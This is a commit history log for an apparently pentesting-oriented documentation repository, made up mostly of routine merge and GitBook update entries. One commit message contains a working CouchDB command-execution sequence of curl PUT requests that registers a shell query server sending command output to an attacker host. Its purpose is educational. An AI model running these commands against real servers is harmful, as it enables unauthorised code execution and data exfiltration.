Commit Graph

404 Commits

Author SHA1 Message Date
Carlos Polop
6cd7d66ee5
Merge pull request #116 from jeffbencteux/patch-1
Command execution via query_servers fix
2021-05-26 00:06:07 +01:00
Carlos Polop
a2d1f6c4da
Merge pull request #115 from Vincevrp/patch-2
Add missing hyphen
2021-05-25 23:52:47 +01:00
Carlos Polop
c8b8631ec8
Merge pull request #114 from Vincevrp/patch-1
Link to English kubectl install documentation
2021-05-25 23:52:23 +01:00
CPol
353938b47c
GitBook: [master] 5 pages and 10 assets modified 2021-05-25 22:52:07 +00:00
Carlos Polop
97c49bdb7a
Merge pull request #112 from clem9669/patch-5
Update Pentesting SNMP
2021-05-25 23:51:28 +01:00
Carlos Polop
097da68802
Merge pull request #111 from AssassinUKG/patch-2
Created 1080
2021-05-25 23:46:44 +01:00
CPol
f60b8d7ea8
GitBook: [master] one page modified 2021-05-24 15:55:07 +00:00
Jeffrey Bencteux
e505cc2b55
Command execution via query_servers fix
Hey man, I got a working example, I think the issue is that you are requesting your view with POST rather than PUT method. Following works for me:

curl -X PUT 'http://<target_ip>:5984/_node/couchdb@localhost/_config/query_servers/cmd' -d '"id | curl http://<attacker_ip>:<port> -d @-"'
curl -X PUT 'http://<target_ip>:5984/testbed'
curl -X PUT 'http://<target_ip>:5984/testbed/whatever' -d '{"_id":"770855a97726d5666d70a22173005c77"}'
curl -X PUT http://<target_ip>:5984/testbed/_design/whatever -d '{"_id":"_design/test","views":{"anything":{"map":""} },"language":"cmd"}' -H "Content-Type: application/json"
2021-05-24 10:43:15 +02:00
Vince
92096e6cd1 Add missing hyphen
The "enumeration from a pod" command example to get all services is missing a hyphen.
2021-05-23 23:24:28 +02:00
Vince
44e0145e11
Link to English kubectl install documentation
The Kubernetes "enumeration from a pod" documentation links to Spanish instructions to install kubectl. This commit changes the URL to the English documentation.
2021-05-23 21:11:01 +00:00
clem9669
430a952347
Update Pentesting SNMP
Adding an extra command to gather information about users
2021-05-19 12:49:04 +00:00
CPol
36c20843d1
GitBook: [master] 461 pages modified 2021-05-15 12:48:28 +00:00
AssassinUKG
e6d2dc62a5
Updated some errors
updated file name to lowercase, added in output
2021-05-14 01:14:06 +01:00
AssassinUKG
52883e4161
Created 1080
I tried to keep to your format and style for the document. very sorry if this is not fully correct. Thank you again for all of your hardwork!
2021-05-14 01:08:24 +01:00
CPol
19ef41e986
GitBook: [master] 2 pages modified 2021-05-13 17:53:07 +00:00
CPol
4e57770caf
GitBook: [master] 4 pages modified 2021-05-11 23:55:16 +00:00
Carlos Polop
cac009b495
Merge pull request #109 from noraj/patch-1
Enumerate Local users with lookupsid
2021-05-11 00:40:12 +02:00
Carlos Polop
d9c09f71c0
Merge pull request #108 from chhajershrenik/patch-1
Enumerating Linked Server
2021-05-11 00:39:21 +02:00
Alexandre ZANNI
6c19730309
Enumerate Local users with lookupsid 2021-05-10 18:48:27 +02:00
CPol
b310683d43
GitBook: [master] one page modified 2021-05-10 08:52:30 +00:00
chhajershrenik
c19d51a6ba
Enumerating Linked Server
Added queries for enumerating linked sql servers databases connected to mssql.
2021-05-10 14:10:35 +05:30
CPol
fa639e1bab
GitBook: [master] 2 pages and 4 assets modified 2021-05-07 15:55:24 +00:00
CPol
083b9fa5f7
GitBook: [master] 457 pages modified 2021-05-04 11:44:49 +00:00
CPol
c620191fb3
GitBook: [master] one page modified 2021-05-02 09:50:46 +00:00
CPol
c6787fa07b
GitBook: [master] 3 pages and 8 assets modified 2021-04-30 12:16:33 +00:00
Carlos Polop
8cb860d13c
Merge pull request #105 from ChrisPritchard/patch-1
Update 8009-pentesting-apache-jserv-protocol-ajp.md
2021-04-30 11:20:35 +02:00
CPol
b486b9fee1
GitBook: [master] 454 pages modified 2021-04-29 12:12:01 +00:00
CPol
f7b6e4a914
GitBook: [master] one page modified 2021-04-29 10:01:21 +00:00
CPol
9a4e816308
GitBook: [master] one page modified 2021-04-28 23:45:03 +00:00
CPol
2c77993d8b
GitBook: [master] 454 pages modified 2021-04-28 23:33:12 +00:00
CPol
89dbdd726a
GitBook: [master] one page and one asset modified 2021-04-28 17:45:30 +00:00
CPol
458bc4a407
GitBook: [master] one page modified 2021-04-28 17:38:47 +00:00
CPol
b5100f93a6
GitBook: [master] one page modified 2021-04-28 17:37:48 +00:00
CPol
7419791f00
GitBook: [master] one page modified 2021-04-28 17:15:53 +00:00
CPol
6f607ffc29
GitBook: [master] 3 pages modified 2021-04-28 17:14:31 +00:00
CPol
c8e6f41301
GitBook: [master] 5 pages modified 2021-04-28 16:27:24 +00:00
CPol
f5d220939a
GitBook: [master] 2 pages modified 2021-04-28 14:34:35 +00:00
CPol
8b924beee2
GitBook: [master] one page modified 2021-04-28 14:06:47 +00:00
CPol
87ea9b42a0
GitBook: [master] 2 pages modified 2021-04-28 13:49:35 +00:00
CPol
2d5784f543
GitBook: [master] one page modified 2021-04-28 13:10:05 +00:00
CPol
43df31398e
GitBook: [master] one page and 2 assets modified 2021-04-28 12:08:08 +00:00
CPol
9d55f28064
GitBook: [master] 5 pages modified 2021-04-27 23:18:16 +00:00
CPol
f44385e325
GitBook: [master] 451 pages modified 2021-04-27 09:44:49 +00:00
Christopher Pritchard
86061153e9
Update 8009-pentesting-apache-jserv-protocol-ajp.md
Added information about Ghostcat, which I ran into on a recent CTF box.
2021-04-27 16:58:23 +12:00
CPol
09a1e84141
GitBook: [master] one page and 5 assets modified 2021-04-26 15:29:19 +00:00
CPol
00cc0765ca
GitBook: [master] one page modified 2021-04-26 15:05:45 +00:00
CPol
3a6aa4f8e5
GitBook: [master] one page and 2 assets modified 2021-04-26 14:49:13 +00:00
CPol
ba6a433744
GitBook: [master] one page modified 2021-04-26 14:33:23 +00:00
CPol
d1024ca73b
GitBook: [master] one page modified 2021-04-26 14:30:22 +00:00
CPol
82d4a60b09
GitBook: [master] 451 pages modified 2021-04-26 14:10:01 +00:00
CPol
0435b5ab82
GitBook: [master] one page modified 2021-04-26 14:01:56 +00:00
CPol
59c7790f57
GitBook: [master] one page modified 2021-04-25 18:33:54 +00:00
CPol
8d521cb5b0
GitBook: [master] one page modified 2021-04-25 16:31:32 +00:00
CPol
9c729bead0
GitBook: [master] one page and 2 assets modified 2021-04-25 11:57:03 +00:00
Carlos Polop
8e166e6a5e
Merge pull request #103 from sickrov/patch-1
Update pentesting-kubernetes.md
2021-04-25 13:55:31 +02:00
CPol
64ca37fc18
GitBook: [master] 4 pages and 3 assets modified 2021-04-25 11:54:36 +00:00
CPol
03e24bf90f
GitBook: [master] one page modified 2021-04-24 17:02:33 +00:00
CPol
6422b672ad
GitBook: [master] 450 pages modified 2021-04-24 16:17:55 +00:00
CPol
4e9a9ee47c
GitBook: [master] one page modified 2021-04-24 16:00:22 +00:00
CPol
f8b6abb826
GitBook: [master] 4 pages modified 2021-04-24 15:51:27 +00:00
sickrov
035551e86d
Update pentesting-kubernetes.md 2021-04-24 17:40:52 +02:00
CPol
322c9cb7f8
GitBook: [master] one page modified 2021-04-24 14:08:22 +00:00
CPol
358023c1bb
GitBook: [master] 449 pages modified 2021-04-24 11:40:49 +00:00
CPol
5ad16a1183
GitBook: [master] 2 pages and one asset modified 2021-04-24 10:51:09 +00:00
Carlos Polop
be1658e9f9
Merge pull request #102 from mr-wacker/master
Adding a new note "Sending an Email with Python" in pentesting/pentesting-smtp
2021-04-23 23:31:17 +02:00
mr-wacker
e73a7e0205
Update README.md 2021-04-22 23:44:15 +03:00
CPol
da8c34e952
GitBook: [master] 5 pages modified 2021-04-22 13:58:44 +00:00
Carlos Polop
68207d282e
Merge pull request #100 from clem9669/patch-4
Update 135-pentesting-msrpc.md
2021-04-22 15:18:25 +02:00
Carlos Polop
059b81784a
Merge pull request #99 from LuskaBol/master
Update README.md
2021-04-22 15:17:45 +02:00
CPol
7410f8b79e
GitBook: [master] one page modified 2021-04-20 18:27:38 +00:00
CPol
d0f0578c07
GitBook: [master] one page modified 2021-04-20 18:26:51 +00:00
CPol
c1ec20400f
GitBook: [master] one page modified 2021-04-20 17:51:23 +00:00
CPol
d9da0f19d5
GitBook: [master] 4 pages modified 2021-04-19 17:04:40 +00:00
CPol
f2ef309097
GitBook: [master] one page modified 2021-04-17 15:00:15 +00:00
CPol
7a6b124269
GitBook: [master] one page modified 2021-04-14 15:16:47 +00:00
CPol
4012e7ab75
GitBook: [master] one page modified 2021-04-14 15:01:04 +00:00
CPol
28377d43e3
GitBook: [master] one page modified 2021-04-13 08:15:22 +00:00
clem9669
be57b93d39
Update 135-pentesting-msrpc.md
Adding few details about the way to get ips and more ressources including HTB APT writeup.
2021-04-12 14:34:48 +00:00
LuskaBol
a01ec45871
Update README.md
adding nuclei to General purpose automatic scanners // adding informations about .env
2021-04-12 01:23:58 -03:00
CPol
caf6f8ef57
GitBook: [master] 4 pages and 3 assets modified 2021-04-11 09:05:05 +00:00
CPol
66659437a7
GitBook: [master] one page modified 2021-04-08 14:50:37 +00:00
CPol
b590213ea3
GitBook: [master] 3 pages and 2 assets modified 2021-04-07 23:12:13 +00:00
CPol
fc9eef3b11
GitBook: [master] 2 pages and one asset modified 2021-04-07 22:08:15 +00:00
CPol
d399bd17b6
GitBook: [master] 2 pages modified 2021-04-05 22:03:17 +00:00
CPol
f4b540cf73
GitBook: [master] 2 pages and 2 assets modified 2021-04-04 18:55:19 +00:00
CPol
92629bbb58
GitBook: [master] one page modified 2021-04-02 23:13:22 +00:00
CPol
868c965dca
GitBook: [master] one page modified 2021-04-02 19:21:43 +00:00
CPol
6496528f99
GitBook: [master] 2 pages modified 2021-04-02 11:54:47 +00:00
CPol
a9113b3212
GitBook: [master] 2 pages modified 2021-04-01 21:42:37 +00:00
CPol
0e1bfa5efc
GitBook: [master] 440 pages modified 2021-04-01 12:55:58 +00:00
CPol
c010d8f114
GitBook: [master] one page modified 2021-04-01 12:41:53 +00:00
CPol
ff45a89779
GitBook: [master] one page modified 2021-04-01 12:07:26 +00:00
CPol
8a5f32b1b4
GitBook: [master] one page and 2 assets modified 2021-04-01 11:45:00 +00:00
CPol
a5c0d16ec8
GitBook: [master] 4 pages modified 2021-03-31 10:24:54 +00:00
CPol
9d73005b51
GitBook: [master] 3 pages modified 2021-03-31 10:21:23 +00:00
Carlos Polop
a518d603e3
Merge pull request #89 from brendanwr/patch-1
Fix command used
2021-03-31 11:18:29 +01:00
Carlos Polop
94cbecd5e8
Merge pull request #90 from brendanwr/patch-2
Fix spelling
2021-03-31 11:17:53 +01:00
mr-wacker
cb4d3e7216
Adding a new topic "trace.axd"
"trace.axd" is debugging mode and disclosure internal sensitive information.
2021-03-30 13:27:03 +03:00
CPol
64582efd05
GitBook: [master] one page modified 2021-03-29 17:06:12 +00:00
CPol
a11c23be81
GitBook: [master] 2 pages modified 2021-03-29 16:19:04 +00:00